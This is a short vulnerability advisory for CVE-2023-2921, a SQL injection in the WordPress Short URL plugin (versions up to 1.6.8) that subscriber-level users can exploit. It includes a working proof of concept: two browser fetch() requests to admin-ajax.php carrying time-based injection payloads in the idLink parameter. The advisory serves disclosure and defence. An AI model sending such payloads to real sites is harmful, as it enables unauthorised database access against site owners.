Short URL <= 1.6.8 – Subscriber+ SQLi | CVE 2023-2921

Description

The plugin does not properly sanitise and escape a parameter before using it in SQL statement, leading to a SQL injection exploitable by users with relatively low privilege on the site, like subscribers.

Proof of Concept

Log in as a subscriber, and paste the following in your browser's console:

fetch("/wp-admin/admin-ajax.php", {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    },
    "body": "action=valid_link&idLink=-1 OR sleep(10)",
    "method": "POST",
    "mode": "cors"
});


# This one only works pre-1.6.5
fetch("/wp-admin/admin-ajax.php", {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    },
    "body": "action=reset_link&idLink=-1 OR sleep(10)",
    "method": "POST",
    "mode": "cors"
});